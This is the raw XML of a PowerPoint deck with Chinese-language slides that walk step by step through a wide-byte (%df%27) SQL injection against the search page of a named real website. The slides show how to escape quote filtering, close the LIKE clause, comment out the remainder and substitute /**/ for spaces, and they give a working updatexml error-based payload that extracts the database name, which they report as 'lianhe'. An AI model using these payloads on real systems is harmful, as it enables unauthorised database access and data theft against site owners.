                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LIKE '%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>運</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>info()#%') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Info()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前需要加连接符，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>空格符用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/and/**/ ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%df%27)/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/info()%23</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>lianhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1014857" y="2718737"/>
            <a:ext cx="7114286" cy="228571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latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>更</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>推荐用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/and/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(1,concat(1,(select/**/database())),1)%23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3202728"/>
            <a:ext cx="8229600" cy="131773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blank">
  <a:themeElements>
    <a:clrScheme name="Custom 1">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1D3444"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="8589A1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="ED1A3D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EBE013"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E32490"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C0C2C4"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="ABD8DC"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0096B3"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B9E3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="006F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E_ppt_4x3.pptx [Read-Only]" id="{5F9B16EF-EBC9-41CD-95EE-0C6941C041EF}" vid="{8729C5D8-75B0-4CB3-9C4A-D4ED606D2F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41B9D9FF6CBB604C9E1DEEB0A7AC19C2" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="acd29717c0fb6f4bcc4266517d61b23e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="7e0f54df-ea4c-4e2f-b548-6a171b435a47" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="dba02bd4ab6324e193f01b97a7a3ac5a" ns2:_="">
    <xsd:import namespace="7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:_dlc_DocId" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdUrl" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdPersistId" minOccurs="0"/>
                <xsd:element ref="ns2:dcb22cdabd7e4624b5bf1642ffbcc1f5" minOccurs="0"/>
                <xsd:element ref="ns2:TaxCatchAll" minOccurs="0"/>
                <xsd:element ref="ns2:TaxCatchAllLabel" minOccurs="0"/>
                <xsd:element ref="ns2:c137beb4647f48e1b4858cde3a671b94" minOccurs="0"/>
                <xsd:element ref="ns2:d550a6efa6d04dd3a5eb1387183a1ee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f54df-ea4c-4e2f-b548-6a171b435a4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cb22cdabd7e4624b5bf1642ffbcc1f5" ma:index="11" nillable="true" ma:taxonomy="true" ma:internalName="dcb22cdabd7e4624b5bf1642ffbcc1f5" ma:taxonomyFieldName="GuidesandResourcesAudience" ma:displayName="Audience" ma:fieldId="{dcb22cda-bd7e-4624-b5bf-1642ffbcc1f5}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="b8c4b4df-caac-4b11-bdd3-d4a9a37e705a"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e6277896-64a3-47ce-b65c-b5c8de6555a8}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="7e0f54df-ea4c-4e2f-b548-6a171b435a4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e6277896-64a3-47ce-b65c-b5c8de6555a8}" ma:internalName="TaxCatchAllLabel" ma:readOnly="true" ma:showField="CatchAllDataLabel" ma:web="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <xsd:complexType>
        <xsd:complexContent>
          <xsd:extension base="dms:MultiChoiceLookup">
            <xsd:sequence>
              <xsd:element name="Value" type="dms:Lookup" maxOccurs="unbounded" minOccurs="0" nillable="true"/>
            </xsd:sequence>
          </xsd:extension>
        </xsd:complexContent>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="c137beb4647f48e1b4858cde3a671b94" ma:index="15" nillable="true" ma:taxonomy="true" ma:internalName="c137beb4647f48e1b4858cde3a671b94" ma:taxonomyFieldName="GuidesandResourcesTopic" ma:displayName="Topic" ma:fieldId="{c137beb4-647f-48e1-b485-8cde3a671b94}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="631d41d5-3326-49c0-a2fe-101255290237" ma:anchorId="00000000-0000-0000-0000-000000000000" ma:open="false" ma:isKeyword="false">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element ref="pc:Terms" minOccurs="0" maxOccurs="1"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="d550a6efa6d04dd3a5eb1387183a1ee5" ma:index="17" nillable="true" ma:taxonomy="true" ma:internalName="d550a6efa6d04dd3a5eb1387183a1ee5" ma:taxonomyFieldName="GuidesandResourcesDocumentType" ma:displayName="Document Type" ma:fieldId="{d550a6ef-a6d0-4dd3-a5eb-1387183a1ee5}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="e8b5b600-f22a-4648-9bd5-c0aa4d7e488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550a6efa6d04dd3a5eb1387183a1ee5 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </d550a6efa6d04dd3a5eb1387183a1ee5>
    <dcb22cdabd7e4624b5bf1642ffbcc1f5 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </dcb22cdabd7e4624b5bf1642ffbcc1f5>
    <TaxCatchAll xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
    <c137beb4647f48e1b4858cde3a671b94 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </c137beb4647f48e1b4858cde3a671b94>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191CB-A024-4081-A1E0-14819E861711}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C8C8F10B-1BCB-4109-9323-7D0E10435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0f54df-ea4c-4e2f-b548-6a171b435a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5C24F2-9E93-4A84-AC18-CBD3FBE675DB}">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7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B808F5A2-E98B-4339-BF45-54351EAB7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65</TotalTime>
  <Words>166</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>10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vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>http://www.yiwulianhe.com/</vt:lpstr>
      <vt:lpstr>闭合单引号时，开发用过滤器规则在你的单引号前面加一个\ ， 这样就无法闭合单引号 方法：可以在\前输入%df，就构成了 %df\ 经过GBK解释器解码后就成为汉字，  (百度可查宽字节注入) 在输入%df %27后，URL编码时如下，将多的25去掉  </vt:lpstr>
      <vt:lpstr>去掉25后，页面（mySQL报错）恭喜你，成功的将SQL出错信息暴露。 http://www.yiwulianhe.com/search.php?keywords=%df%27&amp;part=information SQL语句原型：select * from table where id like(‘%XXX%’) ,前一个单引号已关闭，如何关闭第一个括号？答：再加一个）即可 %df’) ,单引号和括号都已经关闭了，如何把后面的注释掉呢？用-- （--后一定要用空格） </vt:lpstr>
      <vt:lpstr>Slide 5</vt:lpstr>
      <vt:lpstr>试# 也是注释符,但URL编码，把＃去掉了 </vt:lpstr>
      <vt:lpstr>试把＃换成％23 注入成功了</vt:lpstr>
      <vt:lpstr>这时就可以试着在注释符前插入注入语句info()来构造伪SQL语句 LIKE '%運')info()#%')  Info()前需要加连接符，and .空格符用/**/   /**/and/**/ ,即%df%27)/**/and/**/info()%23 数据库为lianhe </vt:lpstr>
      <vt:lpstr>我更推荐用/**/and/**/updatexml(1,concat(1,(select/**/database())),1)%23</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guanyan</dc:creator>
  <cp:lastModifiedBy>guanyan</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2015-01-03T07:13:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-21T08:00:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-21T09:06:02Z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0x01010041B9D9FF6CBB604C9E1DEEB0A7AC19C2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="GuidesandResourcesAudience">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="GuidesandResourcesDocumentType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="GuidesandResourcesTopic">
    <vt:lpwstr/>
  </property>
</Properties>
</file>